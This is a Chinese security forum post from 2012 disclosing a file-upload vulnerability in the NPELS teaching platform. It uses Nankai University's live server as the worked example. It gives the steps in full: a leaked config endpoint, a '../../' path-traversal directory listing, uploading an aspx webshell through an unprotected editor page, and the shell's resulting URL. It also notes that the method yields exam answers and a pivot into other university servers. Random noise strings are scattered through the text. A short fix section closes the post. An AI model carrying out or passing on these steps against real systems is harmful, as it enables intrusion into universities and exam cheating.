找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2295|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中" D/ o" V) Q  W

, y5 `1 j% c$ E% j* W/ x详细说明:# y2 Z( T. L5 l* P" h6 g% Q

- K+ s8 v' Z, R9 R( T3 R3 p. M以南开大学的为例: $ h2 k) h2 L" f8 G- c3 Z5 S
http://222.30.60.3/NPELS
: [$ @* E9 V  F5 k/ V+ fNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
  m& g; T2 B! h1 g<setting name="Update_CommonSvr_CommonService" serializeAs="String">7 B8 O5 I( [0 j3 b9 j( ^# i
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>! X6 f; s8 a% D: k
</setting>
, o' e7 O& C9 _* u0 |0 c7 J及版本号
0 Q! f  ?* e' M' k4 p" \) ], i<add key="TVersion" value="1, 0, 0, 2187">
7 c, C/ i1 ?# n</add>  o# q( s4 k/ _; p( n
直接访问& _* g$ b% ~- E7 V5 c
http://222.30.60.3/NPELS/CommonService.asmx1 ]$ ~6 `3 n4 X! L
使用GetTestClientFileList操作,直接 HTTP GET 列目录:% m( D2 c& K% w- K# Y8 c
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
& O0 i. q5 O) p& y5 T* F进一步列目录(返回的网页很大,可以直接 wget 下来)
. x8 E" U+ f5 @  ]" k! X3 B7 {' y, y- Nhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
/ t2 L" ]5 N5 N5 @2 r/ Z6 p
  m( {6 E& ^% c, }+ a发现# y; A0 V5 u7 ?! l1 |+ u2 D
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
0 [9 i0 X" p3 i  A' I2 W. J可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头/ G1 D' L. u3 D+ j2 i/ Y
上传后继续列目录找到木马地址直接访问即可
! S( U4 N% P! g7 ?+ W
/ @& B7 C, j, O- d( pOOXX5 ]+ L8 _8 B8 \( y6 [  q

% p! y1 u+ r; a/ w5 Z( t# GGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法' S7 c: S* B; P5 W% S8 v( y' V8 f2 B
漏洞证明:
4 T5 \3 s9 P# f, \- P 4 k( T% b! A8 m( V# b1 Y" O$ N
列目录:8 a  k9 e: ]5 ^: h) `+ M
http://222.30.60.3/NPELS/CommonS ... List?version=../../
; p  n! @2 y! E% h( x文件上传:5 o3 X# o/ L/ V& e4 V3 ]1 G
http://222.30.60.3/npelsv/editor/editor.htm4 Q2 M: k7 b9 X: ^

. M0 r4 k) y" x5 [. s8 U上传木马:2 B! x7 e) B2 W5 ~5 ~: C- ^
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
  U) g! W3 f: f; K; S
& p! V6 C  Q0 w+ x, t修复方案:
1 Y+ q' u# X. R. d! {/ c好像考试系统必须使用 CommonService.asmx
  N% p( h* F9 `8 L. X( @' J最好配置文件加密或者用别的方式不让它泄露出来3 a0 v& _9 U% `% I
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​
6 u' O8 s5 N; k- j. ]+ Y6 e# z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表